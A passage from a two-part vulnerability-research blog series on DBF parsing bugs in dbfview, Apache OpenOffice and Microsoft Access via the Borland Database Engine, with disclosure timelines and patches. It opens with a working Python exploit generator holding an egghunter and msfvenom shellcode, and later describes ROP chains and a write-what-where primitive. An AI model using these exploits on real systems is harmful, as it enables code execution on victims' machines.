payload += pack('<i', 1)                # number of records
payload += pack('<h', 65)               # number of records
payload += pack('<h', 4095)             # length of each record
payload += 20 * b'\x00'                 # reserved bytes

# field definition
payload += pack('11s', b'EXPLOIT')      # field name
payload += b'2'                         # field type (short integer)
payload += 4 * b'\x00'                  # field data address (can be null)
payload += pack('B', 255)               # field size (change accordingly)
payload += 15 * b'\x00'                 # reserved bytes
payload += b'\x0D'                      # terminator character

# record definition
payload += b'\x20'                      # deleted flag
payload += 28 * b'\x90'                 # offset
# payload += 4 * b'\x41'                # offset
payload += pack("<L", (0x909006eb))     # JMP 06
payload += pack("<L", (0x00457886))     # dbfview: pop edi; pop esi; ret
payload +=  egghunter                      
payload += b'w00tw00t'                  # egg

# msfvenom -p windows/exec CMD=calc -f python -v payload
payload += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64"
payload += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"
payload += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c"
payload += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"
payload += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
payload += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49"
payload += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
payload += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"
payload += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b"
payload += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
payload += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
payload += b"\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00"
payload += b"\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
payload += b"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
payload += b"\x00\x53\xff\xd5\x63\x61\x6c\x63\x00"

with open('payload.dbf', 'wb') as w:
    w.write(payload)

I opened the generated file in dbfview.exe, and popped Calc. Great!

POC Video

Source Code Review of Apache OpenOffice

Now that I had validated my dumb fuzzing template on a few smaller DBF processors, it was time to aim higher. The dumb fuzzing stage taught me that the DBF file format suffers from an inherent weakness: the buffer size of a record can be determined either by the fieldLength or the fieldType in the header. If a programmer blindly trusts one of them when allocating a buffer, but uses the other to determine the size of a copy into that buffer, this can lead to a buffer overflow.

As some open-source projects like Apache OpenOffice support DBF files, I decided to perform a source code review for this vulnerability. Not long after, I hit the jackpot on OpenOffice's DBF parsing code:

        else if ( DataType::INTEGER == nType )
        {
            sal_Int32 nValue = 0;
			memcpy(&nValue, pData, nLen);
            *(_rRow->get())[i] = nValue;
        }

Here, we can see a buffer nValue of size sal_Int32 (4 bytes) being instantiated for a field of type INTEGER. Next, memcpy copies a buffer of size nLen – which is an attacker-controlled value – into nValue without validating that nLen is smaller than or equal to 4. This pattern was repeated across various data types. Could this be a variation of the previous buffer overflow? I quickly modified my previous payload generator to the integer field type (I), increased the size of fieldLength to greater than sal_Int32, and opened the file in OpenOffice Calc. I got my crash!

Unfortunately, things weren't so easy this time round. Although the initial crash resulted in an SEH overwrite, the SEH chain refused to execute. The soffice binary itself had Safe Exception Handlers (SAFESEH) protections on, along with address space layout randomization (ASLR) and Data Execution Prevention (DEP), which prevented simple exploitation of the overflow.

Tracing back from the initial exception, I realised that it was triggered by some kind of validation check earlier in the execution flow:

0:000> p
eax=08ceacec ebx=0ffe68e8 ecx=08ceacf0 edx=00000001 esi=0ff38d60 edi=084299b9
eip=08c56920 esp=0178dd58 ebp=0178de74 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
dbase+0x16920:
08c56920 e862c6feff      call    dbase+0x2f87 (08c42f87)
0:000> u dbase+0x2f87 L12
dbase+0x2f87:
08c42f87 55              push    ebp
08c42f88 8bec            mov     ebp,esp
08c42f8a 56              push    esi
08c42f8b 8bf1            mov     esi,ecx
08c42f8d 8b4610          mov     eax,dword ptr [esi+10h]
08c42f90 2b460c          sub     eax,dword ptr [esi+0Ch]
08c42f93 57              push    edi
08c42f94 8b7d08          mov     edi,dword ptr [ebp+8]
08c42f97 c1f802          sar     eax,2
08c42f9a 3bf8            cmp     edi,eax
08c42f9c 7206            jb      dbase+0x2fa4 (08c42fa4)
08c42f9e ff1588b0c608    call    dword ptr [dbase!GetVersionInfo+0x9176 (08c6b088)]
08c42fa4 8b460c          mov     eax,dword ptr [esi+0Ch]
08c42fa7 8d04b8          lea     eax,[eax+edi*4]
08c42faa 5f              pop     edi
08c42fab 5e              pop     esi
08c42fac 5d              pop     ebp
08c42fad c20400          ret     4

Since the exception was triggered if the cmp edi,eax check failed, I performed dynamic analysis to determine the offset in my payload that was being evaluated, and set it to 00000001 to pass the check. This time, a different exception occurred – an invalid instruction exception.

This was a good sign that I had overwritten a return pointer on the stack and could thus control the execution flow again, which I confirmed in WinDBG. However, I still needed to get a DEP and ASLR bypass to start my return-oriented programming chain. Once again, I checked the protections of the loaded modules with narly:

0:011> !nmod
00110000 00b9c000 soffice              /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\soffice.bin
03e20000 04b67000 icudt40              NO_SEH                      C:\Program Files\OpenOffice 4\program\icudt40.dll
4de60000 4df58000 libxml2              /SafeSEH ON  /GS            C:\Program Files\OpenOffice 4\program\libxml2.dll
50040000 50097000 scui                 /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\scui.DLL
500a0000 502d3000 sb                   /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\sb.dll
50360000 50395000 forui                /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\forui.dll
503a0000 503e1000 uui                  /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\uui.dll
50470000 504bf000 ucpfile1             /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\ucpfile1.dll
504c0000 5053a000 configmgr_uno        /SafeSEH ON  /GS *ASLR *DEP C:\Program Files\OpenOffice 4\program\configmgr.uno.dll

Bingo. Among the various modules, libxml2 was still compiled without any DEP or ASLR protections, allowing me to use it as a source of ROP gadgets. I dumped all possible ROP gadgets with 0vercl0k's rp tool and got to work. I quickly encountered a problem: no matter how I set fieldLength value, it appeared that the overwritten buffer was limited to about 256 bytes. This precluded a traditional GetModuleHandleA > GetProcAddress > VirtualProtect chain, forcing me to try harder to meet this size limit. I began by trying a few optimizations. I moved my final VirtualProtect skeleton before the ROP chain in the buffer, giving me a little more room for my ROP gadgets. For my stack pivot, I used a hard-coded add esp, 0x0C ; ret ; gadget so that I did not have to dynamically create the offset in my chain. Lastly, for the purposes of the proof-of-concept, I decided to simply load WinExec to pop calc. This reduced the number of function calls I needed.

With a bit of elbow grease, I was finally able to get my proof-of-concept to work:

INSERT VIDEO HERE

With the insights I gathered from simple dumb fuzzing, I managed to get a code execution vulnerability in a software that was downloaded more than 300 million times! This begged the question: why did no one discover this bug earlier? As an open-source program, OpenOffice would undoubtedly have been automatically scanned by various static code analysers, which would have easily picked up the unsafe memcpy.

When I checked OpenOffice's page on https://lgtm.com/, a code analysis platform that runs CodeQL tests on open-source projects, I noticed something interesting:

LGTM OpenOffice

OpenOffice was tagged as a Python and JavaScript project. Since CodeQL requires the scanner to build a database of the relevant source code, CodeQL would have completely missed these vulnerabilities if OpenOffice's C++ code had been excluded while building the database. Browsing the files on LGTM, I noticed that there were no C++ files included. This demonstrates the importance of sanity-checking automated static analysis tools; if your tools don't know the code exists, it can't find those vulnerabilities.

Disclosing the Vulnerabilities

As it was my first foray into vulnerability research, I encountered a bit of a culture shock when it came to disclosure. Unlike web-based bug bounties where patches are relatively easier to deploy and resolve in a matter of days or weeks, development cycles for native applications, especially widely used ones, can be on the order of months. While Scalabium dBase viewer was run by a single developer and could be resolved almost immediately, Apache OpenOffice took much longer.

Scalabium dBase Viewer (CVE-2021-35297)

  • Jun 7: Initial disclosure
  • Jun 9: Acknowledgement and patch
  • Aug 17: CVE assigned

Apache OpenOffice (CVE-2021-33035)

  • 4 May: Initial disclosure
  • 5 May: Acknowledgement
  • 6 May: Request for disclosure/patch timeline
  • 12 May: 2nd request for disclosure/patch timeline
  • 19 May: 3rd request for disclosure/patch timeline
  • 21 May: Apache request for 30 Aug disclosure date and patch verification; CVE assigned
  • 21 May: Verified patch and agreed to 30 Aug disclosure date
  • 22 Jul: Request to re-confirm 30 Aug disclosure date
  • 26 Jul: Apache re-confirmed 30 Aug disclosure date
  • 28 Aug: Notify about 18 Sep full disclosure
  • 18 Sep: Full disclosure

Apache released new packages that patched this vulnerability and updated the source code on GitHub to perform buffer size checking. For example, the integer type now ensures that nLen equals 4:

        else if ( DataType::INTEGER == nType )
        {
            OSL_ENSURE(nLen == 4, "Invalid length for integer field");
            if (nLen != 4) {
                return false;
            }
            sal_Int32 nValue = 0;
			memcpy(&nValue, pData, nLen);
            *(_rRow->get())[i] = nValue;
        }

Overall, my experience with responsibly disclosing vulnerability research has been extremely varied, depending on the maturity and ability of individual vendors. It was definitely a far cry from the service-level agreement (SLA) timelines I enjoyed on third-party platforms. In some cases, vendors did not have a dedicated security disclosure contact, or listed an inactive email.

Conclusion and Next Steps

As I mentioned in the beginning, this blogpost is part one of a two-part series. Dumb fuzzing and source code reviews can only get you so far, especially when dealing with complex black box applications. In a week or two, I will follow up with part two, where I will disclose additional vulnerabilities I discovered via coverage-guided fuzzing in Microsoft Office and others.

In the meantime, I hope this provides guidance to application security pentesters dipping their toes into vulnerability research. I benefited greatly from expanding my offensive security arsenal and found interesting overlaps in the skills and intuition required for successful vulnerability research.

All Your (d)Base Are Belong To Us, Part 2: Code Execution in Microsoft Office (CVE-2021-38646)

22 October 2021 at 11:43

Note: This is a mirror of the Medium blogpost.

Introduction

After discovering relatively straightforward memory corruption vulnerabilities in tiny DBF parsers and Apache OpenOffice, I wanted to cast my net wider. By searching for DBF-related vulnerabilities in Microsoft's desktop database engines, I took one step towards the deep end of the fuzzing pool. I could no longer rely on source code review and dumb fuzzing; this time, I applied black-box coverage-based fuzzing with a dash of reverse engineering. My colleague Hui Yi has written several fantastic articles on fuzzing with WinAFL and DynamoRIO; I hope this article provides a practical application of those techniques to real vulnerabilities.

First, let me give you some context by diving into the history of Windows desktop database drivers.

A Quick History of Windows' Desktop Database Drivers

Following the successful release of Windows 3.0 in 1990, the number of Windows applications grew quickly. Many of these applications needed persistent storage. In those days, computer memory was limited, making it difficult for modern server-based databases like MySQL to operate. As such, the indexed sequential access method (ISAM) was developed. To put it simply, ISAM was a file-based method of database storage that included the dBase database file (DBF) format.

As the number of SQL and ISAM database formats increased, Microsoft sought to create a single, common interface for applications to communicate with these databases. In 1992, it released Open Database Connectivity (ODBC) 1.0 which supported various database formats via additional desktop database drivers. One of these drivers was Microsoft's Joint Engine Technology (Jet) engine consisting of a set of DLLs that added compatibility with different ISAM database formats. For the DBF format, Jet Engine used the Microsoft Jet xBASE ISAM driver (msxbde40.dll).

Desktop Database Drivers Architecture by Microsoft

Jet Engine DLLs

Despite this alphabet soup, both ODBC and Jet engine enjoyed widespread adoption. Many companies also wrote third-party ODBC desktop database drivers for their own proprietary database formats. The inclusion of Jet Engine in Microsoft Access ensured its longevity for more than 30 years, even though it has been largely deprecated by newer technologies such as SQL Server Express. Microsoft Office now uses the Microsoft Office Access Connectivity Engine, a fork of the Jet engine.

To add to the confusion, Microsoft released the Object Linking and Embedding, Database (OLEDB) API in 1996, which acted as a higher-level interface on top of ODBC to access an even greater range of database formats such as object databases and spreadsheets. On top of that, Microsoft released ActiveX Data Objects, an additional API to access OLEDB. Jason Roff attempted to clarify this in the following diagram:

ActiveX Database Objects

However, you might notice that the diagram misses out that ODBC can also call on the Jet Engine drivers to access non-SQL-based data sources such as DBF! This just goes to show how convoluted Microsoft's desktop database driver environment has become – even fairly authoritative sources cannot capture the full picture.

Security researchers took advantage of the age and complexity of the OLEDB/ODBC/Jet Engine architecture to discover countless memory corruption vulnerabilities. What made it more attractive was that many important Microsoft applications such as Microsoft Office and IIS rely on this stack. The most recent publication on this topic, β€œGive Me a SQL Injection, I Shall PWN IIS and SQL Server” presented by Palo Alto researchers at Black Hat Asia 2021, detailed many of these dependencies. In fact, the patchwork architecture was so complex that when Microsoft attempted to deprecate OLEDB in 2011, the number of breakages it caused forced Microsoft to reverse the decision six years later.

Given this context, the Jet Engine was my first port of call for hunting vulnerabilities via the DBF format.

Fuzzing Jet Engine with DBF

If you have read part one of the series, you should have a pretty good understanding of format-based dumb fuzzing. While this might be a cost-effective way of fuzzing simple targets, modern approaches apply coverage-based fuzzing. In short, these fuzzers rely on compile- or run-time instrumentation to determine which code paths have been reached in each fuzzing iteration. Based on this information, the fuzzer tries to reach as many code paths as possible to ensure proper coverage of the target. For example, let's take a simple pseudocode function:

function fuzzMe(inputFile){
    if (readLine(inputFile)[0] === opcode1) {
        runOpCode1(inputFile[1:]);
    } else if (readLine(inputFile)[0] === opcode2) {
        runOpCode2(inputFile[1:]);
    } else {
        die();
    }
}

If the fuzzer mutated the input file to match the first condition, it would know that it had reached a new code path to fuzz further. It would save that mutation (first byte matching opCode1) and continue to mutate on top of that saved mutation. This would ensure that rather than wasting time on the fall-through condition (else { die(); }), the fuzzer was reaching deeper into possibly vulnerable code in runOpCode1. This approach is incredibly powerful and most modern fuzzers are coverage-guided, including my fuzzer of choice WinAFL by Google Project Zero.

Since instrumentation is a computationally expensive operation, coverage-based fuzzers should run on a harness. Imagine a large office application that loads a xyzFormat module and runs the xyzFormat.openXyz function whenever it opens an XYZ file. We could fuzz this by using the large office application to open mutated XYZ files repeatedly, but this would be extremely time- and resource-intensive with coverage-guidance instrumentation. Instead, why not write our own mini-program, or harness, to import the xyzFormat module and run the xyzFormat.openXyz function directly? This would involve reverse-engineering the function call and feeding the right inputs, but greatly speed up fuzzing. There's a lot more to discuss here, but if you want a quick guide on coverage-based fuzzing with WinAFL, check out Hui Yi's blogpost.

As I mentioned, fuzzing Jet Engine was a well-travelled path. After consulting the Palo Alto researchers, I decided to build a harness based on the Microsoft OLE DB Provider for Microsoft Jet. The researchers noted that opening the mutated files and executing a few simple queries were sufficient for a successful harness. Hence, I used the CDataSource and CCommand classes as described in Microsoft's OLEDB programming documentation to open the mutated file (CDataSource.OpenFromInitializationString/CSession.Open), execute a select all query (CCommand.Open), retrieve the column information (CCommand.GetColumnInfo), and finally iterate through the row data (CCommand.GetString). In turn, these OLEDB functions depended on the Microsoft Jet OLEDB provider (msjetoledb40.dll) which used Jet Engine (msjet40.dll).

Here, I hit a roadblock. Even though I could fuzz Jet Engine via OLEDB using the Microsoft.Jet.OLEDB.4.0 connection string, I faced many difficulties setting up Jet Engine on my fuzzing environment. Jet Engine was deprecated and did not interact well with my updated environment. After a bit of tinkering, I decided to switch targets and fuzz the Microsoft Access database engine (acecore.dll) via the Microsoft Access OLEDB Provider (aceoledb.dll) instead. To parse a DBF file, the Access database engine would call on its own xBASE ISAM (acexbe.dll). Since my ultimate target was Microsoft Office, it made sense to fuzz the Access Database Engine instead of Jet Engine. Furthermore, since DBF support was removed, then added back to Access in 2016, there was a chance that some interesting code could have been included. Thus, I switched to the Microsoft.ACE.OLEDB.12.0 connection string.

Next, I minimised the DBF sample corpus with winafl-cmin.py, which selected the smallest set with the greatest possible coverage. Finally, I could start my fuzzer! Or rather, my fuzzers – I ran twelve instances simultaneously thanks to WinAFL's parallel fuzzing support.

The Mystery of the Ghost Crashes

As the fuzzers worked in the background, I continued researching other office applications that parsed DBF files. No crashes occurred immediately, but I figured that this was normal since my fuzzing machine was rather slow. This continued for several days, until I checked one morning and found a bunch of crashes!

WinAFL Fuzzing

WinAFL saved the mutated file that caused each crash in the crashes folder with the error in the filename, such as EXCEPTION_ACCESS_VIOLATION.

WinAFL Crashes

To reproduce the vulnerability, I downloaded the crashing files to a virtual machine with the same OLEDB and Microsoft Access database engine environment, then opened the files with the harness. However, the crash no longer occurred! Even when I inspected the harness execution with WinDBG, nothing stood out; the harness opened and parsed the mutated DBF file without any issues.

What was going on?

I went back to the fuzzing machine and ran the harness with the crashing files. No error.

After much head scratching, I attribute it to a false positive and returned to researching other office applications while the fuzzers continued to run. Meanwhile, the crashes stopped occurring.

A few hours later, the same thing happened! Confused, I checked the files on my fuzzing machine; this time, they managed to crash the harness.

I began to put two and two together. There had to be some difference between the fuzzing machine and the debugging machine that caused the discrepancy. After a few hours of painstaking debugging, I made a discovery: one of the office applications I had installed on my fuzzing machine as part of my research appeared to be causing the crashes.

When I uninstalled the office application (which will remain unnamed), the crashes stopped. When I re-installed it, the mutated files crashed the harness again.

Digging deeper, I ran a stack trace on the crash:

0:000> k
 # ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
00 00f7e360 10e57fc8 IDAPI32!ImltCreateTable2+0x3c6b
01 00f7e38c 67940c19 IDAPI32!DbiOpenTableList+0x31
02 00f7e888 67947046 ACEXBE+0x10c19
03 00f7f110 6794a520 ACEXBE+0x17046
04 00f7f140 6794a295 ACEXBE+0x1a520
05 00f7f15c 5daf71ae ACEXBE+0x1a295
06 00f7f184 5db421cb ACECORE+0x171ae
07 00f7f2c8 5db22f1e ACECORE+0x621cb
08 00f7f360 5db224fe ACECORE+0x42f1e
09 00f7f51c 5db21f8d ACECORE+0x424fe
0a 00f7f640 5db20db2 ACECORE+0x41f8d

The crash occurred in IDAPI32, which was called by ACEXBE (remember that this is the Microsoft Access xBASE ISAM). Where had this come from? A quick Google for β€œIDAPI32” revealed that this library was the β€œBorland Database Engine library”. Huh? Puzzled, I checked the path to the library: c:\Program Files\Common Files\Borland Shared\BDE\IDAPI32.DLL.

Then, it clicked. The unnamed office application had installed the Borland Database Engine (BDE) as a dependency. Somehow, once this was installed, the Microsoft Access database engine xBASE ISAM switched to BDE to parse the DBF files. How did this happen?

Looking through the disassembled code of ACEXBE in IDA Pro, I discovered where it loaded IDAPI32:

.text:1000E1B3 sub_1000E1B3    proc near               ; CODE XREF: sub_1000F82F:loc_1000F9DD↓p
.text:1000E1B3
.text:1000E1B3 Type            = dword ptr -428h
.text:1000E1B3 cbData          = dword ptr -424h
.text:1000E1B3 phkResult       = dword ptr -420h
.text:1000E1B3 Destination     = word ptr -41Ch
.text:1000E1B3 Data            = word ptr -210h
.text:1000E1B3 var_4           = dword ptr -4
.text:1000E1B3
.text:1000E1B3                 push    ebp
.text:1000E1B4                 mov     ebp, esp
.text:1000E1B6                 sub     esp, 428h
.text:1000E1BC                 mov     eax, ds:dword_10037408
.text:1000E1C1                 xor     eax, ebp
.text:1000E1C3                 mov     [ebp+var_4], eax
.text:1000E1C6                 push    edi
.text:1000E1C7                 lea     eax, [ebp+phkResult]
.text:1000E1CD                 push    eax             ; phkResult
.text:1000E1CE                 push    20019h          ; samDesired
.text:1000E1D3                 push    0               ; ulOptions
.text:1000E1D5                 push    offset SubKey   ; "Software\\Borland\\Database Engine"
.text:1000E1DA                 push    80000002h       ; hKey
.text:1000E1DF                 call    ds:RegOpenKeyExW
.text:1000E1E5                 test    eax, eax
.text:1000E1E7                 jz      short loc_1000E1F0
.text:1000E1E9                 xor     eax, eax
.text:1000E1EB                 jmp     loc_1000F54A
...
.text:1000E28E loc_1000E28E:                           ; CODE XREF: sub_1000E1B3+13E↓j
.text:1000E28E                 push    edi             ; SizeInWords
.text:1000E28F                 lea     eax, [ebp+Destination]
.text:1000E295                 push    eax             ; Destination
.text:1000E296                 push    esi             ; Source
.text:1000E297                 call    sub_10007876
.text:1000E29C                 mov     eax, ebx
.text:1000E29E                 sub     eax, esi
.text:1000E2A0                 and     eax, 0FFFFFFFEh
.text:1000E2A3                 cmp     eax, 20Ah
.text:1000E2A8                 jnb     loc_1000F559
.text:1000E2AE                 xor     ecx, ecx
.text:1000E2B0                 mov     [ebp+eax+Destination], cx
.text:1000E2B8                 lea     eax, [ebp+Destination]
.text:1000E2BE                 push    edi
.text:1000E2BF                 push    eax
.text:1000E2C0                 push    offset aIdapi32Dll ; "\\IDAPI32.DLL"
.text:1000E2C5                 call    Mso20Win32Client_1065

It appeared that the Access xBase ISAM included a hard-coded check for the BDE path and would run BDE if it existed! Since BDE was a long-deprecated library, with the last version released in 2001 according to WaybackMachine, this was a classic example of CWE-1104: Use of Unmaintained Third Party Components. There were undoubtedly numerous vulnerabilities left over in this classic piece of software that led to the crashes.

I have explained the technical reason for the crashes. However, to understand how an almost thirty-year-old library ended up in the code of the Microsoft Office Access Database engine, we need to understand the history of the Borland Database Engine.

A Quick History of the Borland Database Engine

In the 1980s, dBase was one of the first tools used by early software developers to build applications. Comprising a database engine and its own programming language, it grew massively due to its first-mover advantage and inspired legions of copycats such as FoxPro. A competing dBase standard called β€œxBase” was created to distinguish itself from dBase's proprietary technology. Many consumer applications back then were written using dBase tools and its derivatives.

In 1991, then-software giant Borland acquired Ashton-Tate, the owner of dBase. However, competition was heating up with an upstart company named Microsoft, which acquired FoxPro and launched its own Microsoft Access database engine. To shore up its product line-up, Borland also acquired WordPerfect, eventually launching its own Borland Office suite that included DBF compatibility.

Over time, Borland failed to keep up with Microsoft as it was forced to adapt to constant changes in the very platform it was developing for – Windows. Eventually, dBase, WordPerfect, and other core Borland products ended up being sold in pieces to various companies. By 2009, Borland was finished – acquired by Micro Focus for $75 million, a shadow of its former self. It's hard to win a war on your opponent's turf.

However, the deep impact dBase made in early software development continues today. After all, Microsoft Access still includes a legacy xBase ISAM engine. Even the choice of β€œxBase” instead of β€œdBase” reflects the cutthroat corporate wars of the past.

Big Database Energy

Back to the Borland Database Engine itself. When I realised the crashes were occurring in the IDAPI32 library, I decided that it would be better to fuzz the IDAPI32 library functions such as DbiOpenTableList and ImltCreateTable2 directly instead of via the high-level OLEDB API. Thankfully, there are still a few tutorials and code snippets online that demonstrate how to call BDE functions to read a DBF file. I had to import several custom structs to support the harness, which ran dbiOpenTable and dbiGetNextRecord to open and parse the database. This removed a lot of the processing overhead of the OLEDB API and allowed me to pinpoint crashes more accurately.

As the crashes stacked up, it was time to triage them. Unlike Peach Fuzzer, WinAFL did not have a convenient triaging helper, but I could easily recreate it using the WinDBG command line interface and PowerShell:

Get-ChildItem "C:\Users\fuzzer\Desktop\crashes" -Filter *.dbf |
Foreach-Object {
      & 'C:\Program Files\Windows Kits\10\Debuggers\x86\windbg.exe' -g -logo C:\Users\fuzzer\Desktop\windbglogs\$_.Name.log -c '.load exploitable;!exploitable;!exchain;q' C:\Users\fuzzer\Desktop\BDEHarness\BDEHarness.exe $_.FullName | Out-Null
}

The script iterated through all the crash files, ran them using the harness in WinDBG, then generated a log file containing the !exploitable output. Next, I focused on the EXPLOITABLE crashes and grouped the ones that had the same crashing instructions.

Right off the bat, two crashes stood out to me.

The Second Order EIP Overwrite

The first crash looked like this:

0:000> r
eax=29ae1de1 ebx=00000000 ecx=1c3be2dc edx=015531a0 esi=1c3bfa4c edi=01553c1c
eip=1bd2f8cd esp=01552e54 ebp=01553808 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
IDAPI32!ImltCreateTable2+0x3c6b:
1bd2f8cd ff10            call    dword ptr [eax]      ds:0023:29ae1de1=????????

This was extremely promising because it looked like I had overwritten the EAX register, which was then used in a call instruction. This meant that I could control the execution flow by changing which address the program would jump to. Just like in my dumb fuzzing workflow, I created a β€œminimal viable crash” to pinpoint the source of the overwritten EAX bytes.

However, even after minimising the file to the essential few bytes, I realised that none of the bytes in my mutated file matched the overwritten EAX! This was strange, so I searched the application memory for 29ae1de1 to trace back to its source. I realised that these bytes appeared to be coming from the same region of memory but varied based on the value of lengthOfEachRecord in my file.

If you recall from part one, the format of the DBF header looks like this:

struct DBF {
	struct HEADER {
		char version;
		struct DATE_OF_LAST_UPDATE {
			char yy <read=yearFrom1900,format=decimal>;
			char mm <format=decimal>;
			char dd <format=decimal>;
		} DateOfLastUpdate;
		ulong	numberOfRecords;
		ushort	lengthOfHeaderStructure;
		ushort	lengthOfEachRecord;
		char	reserved[2];
		char	incompleteTrasaction <format=decimal>;
		char	encryptionFlag <format=decimal>;
		int	freeRecordThread;
		int	reserved1[2];
		char	mdxFlag <format=decimal>;
		char	languageDriver <format=decimal>;
		short	reserved2;
	} header;

Based on the minimal viable crash, the overflow occurred due to an arbitrarily large lengthOfEachRecord, which caused an oversized memcpy later. In turn, the last byte of lengthOfEachRecord changed the address of the value that EAX was later overwritten with.

Here's a helpful graphic to illustrate this point(er).

Second Order Overwrite

However, it appeared that the crash only occurred within a certain range of values of lengthOfEachRecord. By painstakingly incrementing the last byte, I enumerated these values:

lengthOfEachRecord EAX Source Address EAX
08 FE 106649b6 46424400
18 FE 106649c6 41424400
28 FE 106649d6 45534142
38 FE 106649e6 3b003745
48 FE 106649f6 595e1061
58 FE 10664a06 53091061
68 FE 10664a16 00000000
78 FE 10664a26 60981061
88 FE 10664a36 ab391061
98 FE 10664a46 5c450000
A8 FE 10664a56 65b81061
B8 FE 10664a66 a7b40000
C8 FE 10664a76 00000000
D8 FE 10664a86 6f0e1061
E8 FE 10664a96 29ae1061
F8 FE 10664aa6 80781061

To get my desired code execution, I needed to ensure that the pointer overwrite chain ended at attacker-controlled bytes. I checked each of the potential values of EAX for useful addresses. Unfortunately, none of them pointed to attacker-controlled bytes; while some pointed to unoccupied memory addresses, the rest pointed to other sections of unusable code. I tried overflowing into some of these addresses, but the bytes wrapped around in a way that prevented this from happening. Perhaps the area of memory that contained the possible EAX source addresses was written after the initial overflow.

In the end, I gave up this promising lead as it only caused an indirect execution control at best. On to the next.

The Write-What-Where Gadget

The second crash looked like this:

(26ac.26b0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=00000008 edx=00000021 esi=6bde36dc edi=00490000
eip=4de39db2 esp=00b4d31c ebp=00b4d324 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
IDDBAS32!BL_Exit+0x102:
4de39db2 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> k
 # ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
00 00b4d324 4de00cd8 IDDBAS32!BL_Exit+0x102
01 00b4d344 4de019f6 IDDBAS32!XDrvInit+0x1fb7c
02 00b4d370 4ddfc2a9 IDDBAS32!XDrvInit+0x2089a
03 00b4d4d0 4ddee2cd IDDBAS32!XDrvInit+0x1b14d
04 00b4d9d0 4dde2758 IDDBAS32!XDrvInit+0xd171
05 00b4da0c 4bdff194 IDDBAS32!XDrvInit+0x15fc
06 00b4dcc0 4bde5019 IDAPI32!ImltCreateTable2+0x3532
07 00b4de18 79587bb3 IDAPI32!DbiOpenTable+0xcd

At first glance, this appeared less promising than the EIP overwrite. The references to [edi] and [esi] suggested that indirect addressing would be necessary, and rep movs seemed like a cumbersome instruction to deal with.

On closer inspection, however, I realised that this was one of the most powerful memory corruption gadgets: a write-what-where. The rep movs instruction copies the bytes at [ESI] to [EDI] ECX times. After creating my minimal viable crash, I found that ESI, EDI, and ECX were all controllable via bytes in the payload file and I could write arbitrary bytes anywhere in memory!

The minimal viable crash also underscored the strength of coverage-guided fuzzing. To reach this crashing instruction, fieldName must be set to \x00 to trigger the buffer overflow by causing a copy of the rest of the payload bytes into a zero-length string buffer. On top of that, two other bytes corresponding to the languageDriver byte in the header and an offset in the body had to be set to specific values to reach the crash. This was a hallmark of coverage-guided fuzzing: discovering and eventually crashing edge-case conditions in a complex codebase.

Now that I could write arbitrary bytes to memory, the next step was to execute my own code. Thankfully, given the age of the IDDBAS32 library, it was compiled without any memory protections like Data Execution Prevention (DEP) or Address Space Layout Randomisation (ASLR). As such, I could build a straightforward Return-Oriented Programming (ROP) chain exploit that overwrote a fixed return pointer after the malicious overwrite, then worked its way through GetModuleHandleA > GetProcAddress > WinExec.

With the new payload, my harness executed the overwrite and popped Calc.exe without a hitch. Filled with excitement, I opened Microsoft Office Access and added the payload as an external database. It crashed... with no Calculator. What happened?

As it turned out, even though IDDBAS32 was compiled without memory protections, Microsoft Office has enabled Forced ASLR since 2013, which adds address randomisation to loaded libraries even if they were not compiled with it. This stumped quite a few adversaries in the past, such as this CVE-2017-11826 exploit sample analysed by McAfee researchers. In my case, since the addresses of IDDBAS32 were randomised, my exploit was sending the instruction pointer to random addresses instead of the start of my ROP chain.

In such cases where you can no longer rely on non-ASLR modules, the only option is to leak addresses through a memory read gadget. This is much easier to do in a scripting context like JavaScript for a browser exploit. You can run the memory address leak exploit first before your memory write exploit. When opening a database or document in Microsoft Office, however, your options become a lot more limited unless you rely on macros, which is not the ideal exploit scenario. Fortunately, CVE-2021-40444 also highlighted another scripting environment in Office: ActiveX. As another researcher noted on Twitter, this creates another path to bypass ASLR by loading stripped DLLs.

Regardless of your choice of ASLR bypass, once the addresses are correctly aligned, the exploit runs on Access smoothly:

POC

With the exploit completed, I reported the vulnerability at the Microsoft Security Response Centre.

  • 25 June: Initial disclosure
  • 7 July: Case opened
  • 16 July: Vulnerability confirmed
  • 14 September: Fix released (Patch Tuesday)
  • 18 September: Public Disclosure

Conclusion

